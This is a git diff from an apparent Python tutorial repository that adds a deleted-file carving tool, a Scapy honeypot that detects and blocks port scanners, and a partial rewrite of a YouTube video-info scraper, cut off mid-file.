+++ b/python-for-multimedia/recover-deleted-files/file_recovery.py
@@ -0,0 +1,552 @@
+
+import os
+import sys
+import argparse
+import struct
+import time
+import logging
+import subprocess
+import signal
+from datetime import datetime, timedelta
+from pathlib import Path
+import binascii
+
+# File signatures (magic numbers) for common file types
+FILE_SIGNATURES = {
+    'jpg': [bytes([0xFF, 0xD8, 0xFF, 0xE0]), bytes([0xFF, 0xD8, 0xFF, 0xE1])],
+    'png': [bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])],
+    'gif': [bytes([0x47, 0x49, 0x46, 0x38, 0x37, 0x61]), bytes([0x47, 0x49, 0x46, 0x38, 0x39, 0x61])],
+    'pdf': [bytes([0x25, 0x50, 0x44, 0x46])],
+    'zip': [bytes([0x50, 0x4B, 0x03, 0x04])],
+    'docx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'xlsx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'pptx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'mp3': [bytes([0x49, 0x44, 0x33])],
+    'mp4': [bytes([0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70])],
+    'avi': [bytes([0x52, 0x49, 0x46, 0x46])],
+}
+
+# Additional validation patterns to check after finding the signature
+# This helps reduce false positives
+VALIDATION_PATTERNS = {
+    'docx': [b'word/', b'[Content_Types].xml'],
+    'xlsx': [b'xl/', b'[Content_Types].xml'],
+    'pptx': [b'ppt/', b'[Content_Types].xml'],
+    'zip': [b'PK\x01\x02'],  # Central directory header
+    'pdf': [b'obj', b'endobj'],
+}
+
+# File endings (trailer signatures) for some file types
+FILE_TRAILERS = {
+    'jpg': bytes([0xFF, 0xD9]),
+    'png': bytes([0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82]),
+    'gif': bytes([0x00, 0x3B]),
+    'pdf': bytes([0x25, 0x25, 0x45, 0x4F, 0x46]),
+}
+
+# Maximum file sizes to prevent recovering corrupted files
+MAX_FILE_SIZES = {
+    'jpg': 30 * 1024 * 1024,  # 30MB
+    'png': 50 * 1024 * 1024,  # 50MB
+    'gif': 20 * 1024 * 1024,  # 20MB
+    'pdf': 100 * 1024 * 1024,  # 100MB
+    'zip': 200 * 1024 * 1024,  # 200MB
+    'docx': 50 * 1024 * 1024,  # 50MB
+    'xlsx': 50 * 1024 * 1024,  # 50MB
+    'pptx': 100 * 1024 * 1024,  # 100MB
+    'mp3': 50 * 1024 * 1024,  # 50MB
+    'mp4': 1024 * 1024 * 1024,  # 1GB
+    'avi': 1024 * 1024 * 1024,  # 1GB
+}
+
+class FileRecoveryTool:
+    def __init__(self, source, output_dir, file_types=None, deep_scan=False, 
+                 block_size=512, log_level=logging.INFO, skip_existing=True,
+                 max_scan_size=None, timeout_minutes=None):
+        """
+        Initialize the file recovery tool
+        
+        Args:
+            source (str): Path to the source device or directory
+            output_dir (str): Directory to save recovered files
+            file_types (list): List of file types to recover
+            deep_scan (bool): Whether to perform a deep scan
+            block_size (int): Block size for reading data
+            log_level (int): Logging level
+            skip_existing (bool): Skip existing files in output directory
+            max_scan_size (int): Maximum number of bytes to scan
+            timeout_minutes (int): Timeout in minutes
+        """
+        self.source = source
+        self.output_dir = Path(output_dir)
+        self.file_types = file_types if file_types else list(FILE_SIGNATURES.keys())
+        self.deep_scan = deep_scan
+        self.block_size = block_size
+        self.skip_existing = skip_existing
+        self.max_scan_size = max_scan_size
+        self.timeout_minutes = timeout_minutes
+        self.timeout_reached = False
+        
+        # Setup logging
+        self.setup_logging(log_level)
+        
+        # Create output directory if it doesn't exist
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        
+        # Statistics
+        self.stats = {
+            'total_files_recovered': 0,
+            'recovered_by_type': {},
+            'start_time': time.time(),
+            'bytes_scanned': 0,
+            'false_positives': 0
+        }
+        
+        for file_type in self.file_types:
+            self.stats['recovered_by_type'][file_type] = 0
+    
+    def setup_logging(self, log_level):
+        """Set up logging configuration"""
+        logging.basicConfig(
+            level=log_level,
+            format='%(asctime)s - %(levelname)s - %(message)s',
+            handlers=[
+                logging.StreamHandler(),
+                logging.FileHandler(f"recovery_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log")
+            ]
+        )
+        self.logger = logging.getLogger('file_recovery')
+    
+    def _setup_timeout(self):
+        """Arm a SIGALRM timer that sets ``self.timeout_reached``; warn instead where SIGALRM is missing."""
+        if self.timeout_minutes and hasattr(signal, "SIGALRM"):
+            def timeout_handler(signum, frame):
+                self.logger.warning(f"Timeout of {self.timeout_minutes} minutes reached!")
+                self.timeout_reached = True
+            signal.signal(signal.SIGALRM, timeout_handler)
+            signal.alarm(int(self.timeout_minutes * 60))  # alarm() takes whole seconds
+        elif self.timeout_minutes:
+            self.logger.warning("Timeout not supported on this platform (no signal.SIGALRM); scanning without it")
+    
+    def get_device_size(self):
+        """Return the size in bytes of ``self.source``, or a 1 GiB guess if every probe fails."""
+        if os.path.isfile(self.source):
+            # Regular file
+            return os.path.getsize(self.source)
+        else:
+            # Anything else is probed as a block device, one method after another
+            try:
+                # Try using blockdev command (Linux)
+                result = subprocess.run(['blockdev', '--getsize64', self.source],
+                                        capture_output=True, text=True, check=True)
+                return int(result.stdout.strip())
+            except (subprocess.SubprocessError, OSError, ValueError):
+                try:
+                    # Try the BLKGETSIZE64 ioctl (fcntl does not exist on Windows)
+                    import fcntl
+                    with open(self.source, 'rb') as fd:
+                        # BLKGETSIZE64 = 0x80081272, fills the 8-byte buffer
+                        buf = bytearray(8)
+                        fcntl.ioctl(fd, 0x80081272, buf)
+                        return struct.unpack('=Q', buf)[0]  # native 'L' is only 4 bytes on some platforms
+                except Exception:
+                    # Last resort: try to seek to the end
+                    try:
+                        with open(self.source, 'rb') as fd:
+                            fd.seek(0, 2)  # Seek to end
+                            return fd.tell()
+                    except Exception:
+                        self.logger.warning("Could not determine device size. Using fallback size.")
+                        # Fallback size so callers still get a number to work with
+                        return 1024 * 1024 * 1024  # 1GB
+    
+    def scan_device(self):
+        """Scan the device for deleted files"""
+        self.logger.info(f"Starting scan of {self.source}")
+        self.logger.info(f"Looking for file types: {', '.join(self.file_types)}")
+        
+        try:
+            # Get device size
+            device_size = self.get_device_size()
+            self.logger.info(f"Device size: {self._format_size(device_size)}")
+            
+            # Set up timeout if specified
+            if self.timeout_minutes:
+                self._setup_timeout()
+                self.logger.info(f"Timeout set for {self.timeout_minutes} minutes")
+            
+            with open(self.source, 'rb', buffering=0) as device:  # buffering=0 for direct I/O
+                self._scan_device_data(device, device_size)
+                
+        except (IOError, OSError) as e:
+            self.logger.error(f"Error accessing source: {e}")
+            return False
+        
+        self._print_summary()
+        return True
+    
+    def _scan_device_data(self, device, device_size):
+        """Scan the device data for file signatures"""
+        position = 0
+        
+        # Limit scan size if specified
+        if self.max_scan_size and self.max_scan_size < device_size:
+            self.logger.info(f"Limiting scan to first {self._format_size(self.max_scan_size)} of device")
+            device_size = self.max_scan_size
+        
+        # Create subdirectories for each file type
+        for file_type in self.file_types:
+            (self.output_dir / file_type).mkdir(exist_ok=True)
+        
+        scan_start_time = time.time()
+        last_progress_time = scan_start_time
+        
+        # Read the device in blocks
+        while position < device_size:
+            # Check if timeout reached
+            if self.timeout_reached:
+                self.logger.warning("Stopping scan due to timeout")
+                break
+                
+            try:
+                # Seek to position first
+                device.seek(position)
+                
+                # Read a block of data
+                data = device.read(self.block_size)
+                if not data:
+                    break
+                    
+                self.stats['bytes_scanned'] += len(data)
+                
+                # Check for file signatures in this block
+                for file_type in self.file_types:
+                    signatures = FILE_SIGNATURES.get(file_type, [])
+                    
+                    for signature in signatures:
+                        sig_pos = data.find(signature)
+                        
+                        if sig_pos != -1:
+                            # Found a file signature, try to recover the file
+                            absolute_pos = position + sig_pos
+                            device.seek(absolute_pos)
+                            
+                            self.logger.debug(f"Found {file_type} signature at position {absolute_pos}")
+                            
+                            # Recover the file
+                            if self._recover_file(device, file_type, absolute_pos):
+                                self.stats['total_files_recovered'] += 1
+                                self.stats['recovered_by_type'][file_type] += 1
+                            else:
+                                self.stats['false_positives'] += 1
+                            
+                            # Reset position to continue scanning
+                            device.seek(position + self.block_size)
+                
+                # Update position and show progress
+                position += self.block_size
+                current_time = time.time()
+                
+                # Show progress every 5MB or 10 seconds, whichever comes first
+                if (position % (5 * 1024 * 1024) == 0) or (current_time - last_progress_time >= 10):
+                    percent = (position / device_size) * 100 if device_size > 0 else 0
+                    elapsed = current_time - self.stats['start_time']
+                    
+                    # Calculate estimated time remaining
+                    if position > 0 and device_size > 0:
+                        bytes_per_second = position / elapsed if elapsed > 0 else 0
+                        remaining_bytes = device_size - position
+                        eta_seconds = remaining_bytes / bytes_per_second if bytes_per_second > 0 else 0
+                        eta_str = str(timedelta(seconds=int(eta_seconds)))
+                    else:
+                        eta_str = "unknown"
+                    
+                    self.logger.info(f"Progress: {percent:.2f}% ({self._format_size(position)} / {self._format_size(device_size)}) - "
+                                    f"{self.stats['total_files_recovered']} files recovered - "
+                                    f"Elapsed: {timedelta(seconds=int(elapsed))} - ETA: {eta_str}")
+                    last_progress_time = current_time
+                    
+            except Exception as e:
+                self.logger.error(f"Error reading at position {position}: {e}")
+                position += self.block_size  # Skip this block and continue
+    
+    def _validate_file_content(self, data, file_type):
+        """
+        Sanity-check carved bytes to weed out false positives.
+
+        Every type gets a size floor; types listed in VALIDATION_PATTERNS also need a pattern hit.
+
+        Args:
+            data: Candidate file contents (bytes-like)
+            file_type: Key looked up in VALIDATION_PATTERNS
+
+        Returns:
+            bool: False when data is shorter than 100 bytes; otherwise True if
+            the type has no patterns or any one of its patterns occurs in data
+        """
+        # Anything under 100 bytes is rejected outright
+        if len(data) < 100:
+            return False
+
+        markers = VALIDATION_PATTERNS.get(file_type, [])
+        if not markers:
+            # Types without registered patterns pass on size alone
+            return True
+
+        # One matching pattern anywhere in the data is enough
+        return any(marker in data for marker in markers)
+    
+    def _recover_file(self, device, file_type, start_position):
+        """
+        Recover a file of the given type starting at the given position
+        
+        Args:
+            device: Open file handle to the device
+            file_type: Type of file to recover
+            start_position: Starting position of the file
+            
+        Returns:
+            bool: True if file was recovered successfully
+        """
+        max_size = MAX_FILE_SIZES.get(file_type, 10 * 1024 * 1024)  # Default to 10MB
+        trailer = FILE_TRAILERS.get(file_type)
+        
+        # Generate a unique filename
+        filename = f"{file_type}_{start_position}_{int(time.time())}_{binascii.hexlify(os.urandom(4)).decode()}.{file_type}"
+        output_path = self.output_dir / file_type / filename
+        
+        if self.skip_existing and output_path.exists():
+            self.logger.debug(f"Skipping existing file: {output_path}")
+            return False
+        
+        # Save the current position to restore later
+        current_pos = device.tell()
+        
+        try:
+            # Seek to the start of the file
+            device.seek(start_position)
+            
+            # Read the file data
+            if trailer and self.deep_scan:
+                # If we know the trailer and deep scan is enabled, read until trailer
+                file_data = self._read_until_trailer(device, trailer, max_size)
+            else:
+                # Otherwise, use heuristics to determine file size
+                file_data = self._read_file_heuristic(device, file_type, max_size)
+            
+            if not file_data or len(file_data) < 100:  # Ignore very small files
+                return False
+                
+            # Additional validation to reduce false positives
+            if not self._validate_file_content(file_data, file_type):
+                self.logger.debug(f"Skipping invalid {file_type} file at position {start_position}")
+                return False
+                
+            # Write the recovered file
+            with open(output_path, 'wb') as f:
+                f.write(file_data)
+                
+            self.logger.info(f"Recovered {file_type} file: {filename} ({self._format_size(len(file_data))})")
+            return True
+            
+        except Exception as e:
+            self.logger.error(f"Error recovering file at position {start_position}: {e}")
+            return False
+        finally:
+            # Restore the original position
+            try:
+                device.seek(current_pos)
+            except:
+                pass  # Ignore seek errors in finally block
+    
+    def _read_until_trailer(self, device, trailer, max_size):
+        """Accumulate 4 KiB reads until ``trailer`` appears, the data ends, or ``max_size`` is reached."""
+        collected = bytearray()
+        read_len = 4096
+
+        while len(collected) < max_size:
+            try:
+                piece = device.read(read_len)
+                if not piece:
+                    break
+                collected += piece
+
+                # Rescan only the newest bytes plus an overlap, so a trailer split across reads is seen
+                search_from = max(0, len(collected) - len(trailer) - read_len)
+                hit = collected.find(trailer, search_from)
+                if hit >= 0:
+                    # Cut right after the trailer
+                    return collected[:hit + len(trailer)]
+            except Exception as e:
+                self.logger.error(f"Error reading chunk: {e}")
+                break
+
+        # No trailer found: hand back what was read, unless it is 100 bytes or fewer
+        return collected if len(collected) > 100 else None
+    
+    def _read_file_heuristic(self, device, file_type, max_size):
+        """
+        Carve a file that has no usable trailer by reading until the data stops looking right.
+
+        Reads from the current position of ``device``. ZIP-based types (zip, docx, xlsx,
+        pptx) must show their marker in the first 16 KiB, otherwise the candidate is
+        rejected. Reading then continues in 4 KiB chunks until the data ends,
+        ``max_size`` is reached, or more than three consecutive chunks look foreign;
+        that trailing run of foreign chunks is trimmed from the result.
+
+        Args:
+            device: Readable binary handle positioned at the start of the candidate file
+            file_type: File type key (e.g. 'jpg', 'zip')
+            max_size: Stop reading once at least this many bytes were collected
+
+        Returns:
+            bytearray with the carved data, or None when nothing could be read or the
+            marker check failed.
+        """
+        chunk_size = 4096
+        zip_markers = {'docx': b'word/', 'xlsx': b'xl/', 'pptx': b'ppt/', 'zip': b'PK\x01\x02'}
+        binary_types = ('jpg', 'png', 'gif', 'pdf', 'zip', 'docx', 'xlsx', 'pptx', 'mp3', 'mp4', 'avi')
+        buffer = bytearray()
+        valid_chunks = 0
+        suspect_run = 0    # consecutive suspicious chunks currently at the tail of buffer
+        suspect_bytes = 0  # their combined length (the final chunk may be short)
+
+        # ZIP-based formats get a larger first read so the marker check sees more data
+        initial_chunk = device.read(16384 if file_type in zip_markers else chunk_size)
+        if not initial_chunk:
+            return None
+        if file_type in zip_markers and zip_markers[file_type] not in initial_chunk:
+            return None
+        buffer.extend(initial_chunk)
+
+        # Continue reading chunks
+        while len(buffer) < max_size:
+            try:
+                chunk = device.read(chunk_size)
+                if not chunk:
+                    break
+                buffer.extend(chunk)
+                if file_type in binary_types:
+                    # Binary formats are read until max size or end of device ...
+                    valid_chunks += 1
+                    # ... except ZIP-based ones: past the first chunks, no "PK" is suspicious
+                    suspicious = file_type in zip_markers and valid_chunks > 10 and b'PK' not in chunk
+                else:
+                    # Other types are treated as text: mostly non-printable bytes are suspicious
+                    printable_ratio = sum(32 <= b <= 126 or b in (9, 10, 13) for b in chunk) / len(chunk)
+                    suspicious = printable_ratio < 0.7
+                    if not suspicious:
+                        valid_chunks += 1
+
+                if suspicious:
+                    suspect_run += 1
+                    suspect_bytes += len(chunk)
+                else:
+                    # A good chunk ends the run, so only chunks "in a row" count
+                    suspect_run = suspect_bytes = 0
+
+                if suspect_run > 3:
+                    return buffer[:len(buffer) - suspect_bytes]
+            except Exception as e:
+                self.logger.error(f"Error reading chunk in heuristic: {e}")
+                break
+
+        return buffer
+    
+    def _format_size(self, size_bytes):
+        """Format size in bytes to a human-readable string"""
+        for unit in ['B', 'KB', 'MB', 'GB', 'TB']:
+            if size_bytes < 1024 or unit == 'TB':
+                return f"{size_bytes:.2f} {unit}"
+            size_bytes /= 1024
+    
+    def _print_summary(self):
+        """Print a summary of the recovery operation"""
+        elapsed = time.time() - self.stats['start_time']
+        
+        self.logger.info("=" * 50)
+        self.logger.info("Recovery Summary")
+        self.logger.info("=" * 50)
+        self.logger.info(f"Total files recovered: {self.stats['total_files_recovered']}")
+        self.logger.info(f"False positives detected and skipped: {self.stats['false_positives']}")
+        self.logger.info(f"Total data scanned: {self._format_size(self.stats['bytes_scanned'])}")
+        self.logger.info(f"Time elapsed: {timedelta(seconds=int(elapsed))}")
+        self.logger.info("Files recovered by type:")
+        
+        for file_type, count in self.stats['recovered_by_type'].items():
+            if count > 0:
+                self.logger.info(f"  - {file_type}: {count}")
+        
+        if self.timeout_reached:
+            self.logger.info("Note: Scan was stopped due to timeout")
+            
+        self.logger.info("=" * 50)
+
+
+def main():
+    """Main function to parse arguments and run the recovery tool"""
+    parser = argparse.ArgumentParser(description='File Recovery Tool - Recover deleted files from storage devices')
+    
+    parser.add_argument('source', help='Source device or directory to recover files from (e.g., /dev/sdb, /media/usb)')
+    parser.add_argument('output', help='Directory to save recovered files')
+    
+    parser.add_argument('-t', '--types', nargs='+', choices=FILE_SIGNATURES.keys(), default=None,
+                        help='File types to recover (default: all supported types)')
+    
+    parser.add_argument('-d', '--deep-scan', action='store_true',
+                        help='Perform a deep scan (slower but more thorough)')
+    
+    parser.add_argument('-b', '--block-size', type=int, default=512,
+                        help='Block size for reading data (default: 512 bytes)')
+    
+    parser.add_argument('-v', '--verbose', action='store_true',
+                        help='Enable verbose output')
+    
+    parser.add_argument('-q', '--quiet', action='store_true',
+                        help='Suppress all output except errors')
+    
+    parser.add_argument('--no-skip', action='store_true',
+                        help='Do not skip existing files in output directory')
+    
+    parser.add_argument('--max-size', type=int, 
+                        help='Maximum size to scan in MB (e.g., 1024 for 1GB)')
+    
+    parser.add_argument('--timeout', type=int, default=None,
+                        help='Stop scanning after specified minutes')
+    
+    args = parser.parse_args()
+    
+    # Set logging level based on verbosity
+    if args.quiet:
+        log_level = logging.ERROR
+    elif args.verbose:
+        log_level = logging.DEBUG
+    else:
+        log_level = logging.INFO
+    
+    # Convert max size from MB to bytes if specified
+    max_scan_size = args.max_size * 1024 * 1024 if args.max_size else None
+    
+    # Create and run the recovery tool
+    recovery_tool = FileRecoveryTool(
+        source=args.source,
+        output_dir=args.output,
+        file_types=args.types,
+        deep_scan=args.deep_scan,
+        block_size=args.block_size,
+        log_level=log_level,
+        skip_existing=not args.no_skip,
+        max_scan_size=max_scan_size,
+        timeout_minutes=args.timeout
+    )
+    
+    try:
+        recovery_tool.scan_device()
+    except KeyboardInterrupt:
+        print("\nRecovery process interrupted by user.")
+        recovery_tool._print_summary()
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()
diff --git a/scapy/honeypot-defense-system/README.md b/scapy/honeypot-defense-system/README.md
new file mode 100644
index 00000000..82c72f3b
--- /dev/null
+++ b/scapy/honeypot-defense-system/README.md
@@ -0,0 +1,4 @@
+# [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system)
+Requires Linux or Windows with WSL, Python 3.8+, and Scapy. Install Scapy using `pip install scapy` or refer to the [Scapy installation guide](https://scapy.readthedocs.io/en/latest/installation.html) for detailed instructions.
+
+Read the full article on [ThePythonCode](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system) for a step-by-step tutorial on building a honeypot defense system using Python and Scapy.
\ No newline at end of file
diff --git a/scapy/honeypot-defense-system/block_port_scan.py b/scapy/honeypot-defense-system/block_port_scan.py
new file mode 100644
index 00000000..43c23e61
--- /dev/null
+++ b/scapy/honeypot-defense-system/block_port_scan.py
@@ -0,0 +1,230 @@
+#!/usr/bin/env python3
+"""
+Honeypot Defense System
+Detects port scanners using decoy ports and blocks malicious IPs
+"""
+
+from scapy.all import *
+from datetime import datetime
+import sys
+
+# ==================== NETWORK INTERFACE ====================
+conf.iface = "enp0s8"  # Specify your network interface
+
+# ==================== CONFIGURATION ====================
+DEFENDER_IP = "192.168.56.101"  # Change this to your Ubuntu IP
+
+# Three-tier port system
+PUBLIC_PORTS = [80]  # Open to everyone (realistic services)
+HONEYPOT_PORTS = [8080, 8443, 3389, 3306]  # Decoy ports to trap attackers
+PROTECTED_PORTS = [443, 53, 22, 5432]  # Hidden unless IP is allowed
+
+ALLOWED_IPS = [
+    "192.168.1.100",  # Add your Kali IP here
+    "192.168.1.1",    # Add other trusted IPs
+]
+MAX_ATTEMPTS = 3  # Block after this many honeypot accesses (changeable)
+LOG_FILE = "honeypot_logs.txt"
+
+# ==================== GLOBALS ====================
+blocked_ips = []
+attempt_tracker = {}  # {IP: attempt_count}
+total_scans = 0
+total_blocks = 0
+
+# ==================== HELPER FUNCTIONS ====================
+
+def log_message(message, color_code=None):
+    """Echo a timestamped log line to the terminal and append it to LOG_FILE.
+
+    message: text to log; color_code: optional ANSI SGR code (e.g. "91")
+    used to colorize the terminal copy only (the file copy is plain).
+    """
+    stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+    line = f"[{stamp}] {message}"
+    # Wrap in ANSI escape sequences only when a color was requested
+    shown = f"\033[{color_code}m{line}\033[0m" if color_code else line
+    print(shown)
+    # Append the uncolored entry to the log file
+    with open(LOG_FILE, "a") as log_file:
+        log_file.write(line + "\n")
+
+
+def is_allowed_ip(ip):
+    """Return True if *ip* exactly matches an entry of the ALLOWED_IPS list."""
+    return ip in ALLOWED_IPS
+
+
+def track_attempt(ip):
+    """Record one more honeypot hit for *ip* and return its running total."""
+    # Addresses not seen before start from zero before this hit is counted
+    hits = attempt_tracker.get(ip, 0) + 1
+    attempt_tracker[ip] = hits
+    return hits
+
+
+def block_ip(ip):
+    """Blocklist *ip* once, counting and logging only a newly added block."""
+    global total_blocks
+    if ip not in blocked_ips:
+        total_blocks += 1
+        blocked_ips.append(ip)
+        log_message(f"[!] IP BLOCKED: {ip}", "91")  # Red
+
+
+def create_response(packet, flags):
+    """Build a spoofed TCP reply to *packet* carrying the given *flags*.
+
+    The reply mirrors the request: Ethernet, IP/IPv6 and TCP source and
+    destination fields are swapped, the sequence number is fixed at 0 and
+    the acknowledgement number is the request's sequence number plus one.
+
+    Args:
+        packet: sniffed frame with Ether, IP or IPv6, and TCP layers.
+        flags: TCP flags for the reply, e.g. "SA" for SYN-ACK.
+    Returns:
+        The assembled Ether / IP-or-IPv6 / TCP frame; it is not sent here.
+    """
+    request_tcp = packet[TCP]
+    link_layer = Ether(src=packet[Ether].dst, dst=packet[Ether].src)
+    if packet.haslayer(IP):
+        network_layer = IP(src=packet[IP].dst, dst=packet[IP].src)
+    else:  # IPv6
+        network_layer = IPv6(src=packet[IPv6].dst, dst=packet[IPv6].src)
+    transport_layer = TCP(
+        sport=request_tcp.dport,
+        dport=request_tcp.sport,
+        flags=flags,
+        seq=0,
+        ack=request_tcp.seq + 1,
+    )
+    return link_layer / network_layer / transport_layer
+
+
+# ==================== MAIN PACKET HANDLER ====================
+
+def handle_packet(packet):
+    """Classify one sniffed TCP packet and answer it per the three port tiers.
+
+    Only pure SYN packets are handled. Blocked sources get no reply; public
+    ports are only logged; honeypot ports always get a SYN-ACK and count a
+    strike for sources outside the allowlist; protected ports get a SYN-ACK
+    only for allowlisted sources. Any other port is left without a reply.
+    """
+    global total_scans
+    # Only process SYN packets (connection attempts)
+    if packet[TCP].flags != "S":
+        return
+    # Extract source IP and destination port
+    if packet.haslayer(IP):
+        source_ip = packet[IP].src
+    else:
+        source_ip = packet[IPv6].src
+    dest_port = packet[TCP].dport
+    total_scans += 1
+    # ===== CHECK IF IP IS BLOCKED FIRST =====
+    if source_ip in blocked_ips:
+        # Drop packet silently - no response to show as "filtered" in nmap
+        log_message(f"[-] Blocked IP {source_ip} denied access to port {dest_port}", "90")
+        return  # Don't send any response - this makes it appear "filtered"
+    
+    # ===== PUBLIC PORTS (open to everyone) =====
+    if dest_port in PUBLIC_PORTS:
+        # Let the real service handle it - no response needed from script
+        log_message(f"[+] Public port {dest_port} accessed by {source_ip}", "94")  # Blue
+        return
+    
+    # ===== HONEYPOT PORTS (trap for attackers) =====
+    if dest_port in HONEYPOT_PORTS:
+        # Always respond with SYN-ACK to appear "open"
+        response = create_response(packet, "SA")
+        sendp(response, verbose=False)
+        # Allowlisted sources are logged but never accumulate strikes
+        if is_allowed_ip(source_ip):
+            log_message(
+                f"[+] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+                f"[!]    Status: TRUSTED IP (allowed)",
+                "92"  # Green
+            )
+        else:
+            # Track attempts for unknown IPs
+            attempts = track_attempt(source_ip)
+            log_message(
+                f"[!] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+                f"[-]    Status: UNKNOWN IP - POTENTIAL ATTACKER\n"
+                f"[!]    Strike {attempts}/{MAX_ATTEMPTS}",
+                "93"  # Yellow
+            )
+            # Block once the strike count reaches MAX_ATTEMPTS
+            if attempts >= MAX_ATTEMPTS:
+                block_ip(source_ip)
+        return
+    
+    # ===== PROTECTED PORTS (only allowed IPs) =====
+    if dest_port in PROTECTED_PORTS:
+        if is_allowed_ip(source_ip):
+            # Respond with SYN-ACK for allowed IPs
+            response = create_response(packet, "SA")
+            sendp(response, verbose=False)
+            log_message(f"[!] Protected port {dest_port} accessed by TRUSTED IP {source_ip}", "92")
+        else:
+            # No reply is sent to unknown IPs, so the port appears filtered
+            log_message(f"[!] Protected port {dest_port} hidden from {source_ip}", "93")
+        return
+    
+    # ===== OTHER PORTS (default behavior - drop silently) =====
+    # Unknown ports are silently dropped (appear filtered)
+
+
+# ==================== STARTUP & MAIN ====================
+
+def print_banner():
+    """Print the startup banner listing the active configuration."""
+    rule = "=" * 60
+    print(
+        "\n" + rule, "[+]  HONEYPOT DEFENSE SYSTEM ACTIVE", rule,
+        f"Defending IP: {DEFENDER_IP}",
+        f"Public Ports (open to all): {PUBLIC_PORTS}",
+        f"Honeypot Ports (trap): {HONEYPOT_PORTS}",
+        f"Protected Ports (allowed IPs only): {PROTECTED_PORTS}",
+        f"Allowed IPs: {ALLOWED_IPS}",
+        f"Block Threshold: {MAX_ATTEMPTS} attempts",
+        f"Log File: {LOG_FILE}", rule,
+        "Monitoring traffic... Press Ctrl+C to stop\n", sep="\n",
+    )
+
+
+def print_summary():
+    """Print end-of-session statistics: scans seen, blocks made, blocklist."""
+    rule = "=" * 60
+    blocklist = blocked_ips if blocked_ips else 'None'
+    print("\n" + rule, "[+] SESSION SUMMARY", rule, sep="\n")
+    print(f"Total scans detected: {total_scans}")
+    print(f"IPs blocked: {total_blocks}")
+    print(f"Current blocklist: {blocklist}")
+    print(rule + "\n")
+
+
+def main():
+    """Sniff TCP traffic sent to DEFENDER_IP and print a summary on exit."""
+    print_banner()
+    # BPF filter: only TCP packets addressed to the defended host
+    packet_filter = f"dst host {DEFENDER_IP} and tcp"
+    try:
+        sniff(filter=packet_filter, prn=handle_packet, store=False)
+    except KeyboardInterrupt:
+        pass  # Ctrl+C raised outside Scapy's own handling: same shutdown path
+    # Scapy's sniff() normally absorbs Ctrl+C and simply returns, so the
+    # shutdown report runs here instead of only inside the except branch.
+    print("\n\n[!] Stopping honeypot defense...")
+    print_summary()
+    sys.exit(0)
+
+
+if __name__ == "__main__":
+    import os  # explicit import: do not rely on scapy's star import exposing `os`
+    # Check for root privileges before sniffing and sending packets
+    if os.geteuid() != 0:
+        print(f"[!] This script requires root privileges. Run with: sudo python3 {sys.argv[0]}")
+        sys.exit(1)
+    main()
diff --git a/scapy/honeypot-defense-system/requirements.txt b/scapy/honeypot-defense-system/requirements.txt
new file mode 100644
index 00000000..93b351f4
--- /dev/null
+++ b/scapy/honeypot-defense-system/requirements.txt
@@ -0,0 +1 @@
+scapy
\ No newline at end of file
diff --git a/web-scraping/youtube-extractor/extract_video_info.py b/web-scraping/youtube-extractor/extract_video_info.py
index 042ce4f8..bed184b0 100644
--- a/web-scraping/youtube-extractor/extract_video_info.py
+++ b/web-scraping/youtube-extractor/extract_video_info.py
@@ -1,92 +1,150 @@
-from requests_html import HTMLSession
-from bs4 import BeautifulSoup as bs
+import requests
+from bs4 import BeautifulSoup
 import re
 import json
-
-# init session
-session = HTMLSession()
-
+import argparse
 
 def get_video_info(url):
-    # download HTML code
-    response = session.get(url)
-    # execute Javascript
-    response.html.render(timeout=60)
-    # create beautiful soup object to parse HTML
-    soup = bs(response.html.html, "html.parser")
-    # open("index.html", "w").write(response.html.html)
-    # initialize the result
-    result = {}
-    # video title
-    result["title"] = soup.find("meta", itemprop="name")['content']
-    # video views
-    result["views"] = soup.find("meta", itemprop="interactionCount")['content']
-    # video description
-    result["description"] = soup.find("meta", itemprop="description")['content']
-    # date published
-    result["date_published"] = soup.find("meta", itemprop="datePublished")['content']
-    # get the duration of the video
-    result["duration"] = soup.find("span", {"class": "ytp-time-duration"}).text
-    # get the video tags
-    result["tags"] = ', '.join([ meta.attrs.get("content") for meta in soup.find_all("meta", {"property": "og:video:tag"}) ])
-
-    # Additional video and channel information (with help from: https://stackoverflow.com/a/68262735)
-    data = re.search(r"var ytInitialData = ({.*?});", soup.prettify()).group(1)
-    data_json = json.loads(data)
-    videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']
-    videoSecondaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][1]['videoSecondaryInfoRenderer']
-    # number of likes
-    likes_label = videoPrimaryInfoRenderer['videoActions']['menuRenderer']['topLevelButtons'][0]['toggleButtonRenderer']['defaultText']['accessibility']['accessibilityData']['label'] # "No likes" or "###,### likes"
-    likes_str = likes_label.split(' ')[0].replace(',','')
-    result["likes"] = '0' if likes_str == 'No' else likes_str
-    # number of likes (old way) doesn't always work
-    # text_yt_formatted_strings = soup.find_all("yt-formatted-string", {"id": "text", "class": "ytd-toggle-button-renderer"})
-    # result["likes"] = ''.join([ c for c in text_yt_formatted_strings[0].attrs.get("aria-label") if c.isdigit() ])
-    # result["likes"] = 0 if result['likes'] == '' else int(result['likes'])
-    # number of dislikes - YouTube does not publish this anymore...
-    # result["dislikes"] = ''.join([ c for c in text_yt_formatted_strings[1].attrs.get("aria-label") if c.isdigit() ])	
-    # result["dislikes"] = '0' if result['dislikes'] == '' else result['dislikes']
-    result['dislikes'] = 'UNKNOWN'
-    # channel details
-    channel_tag = soup.find("meta", itemprop="channelId")['content']
-    # channel name
-    channel_name = soup.find("span", itemprop="author").next.next['content']
-    # channel URL
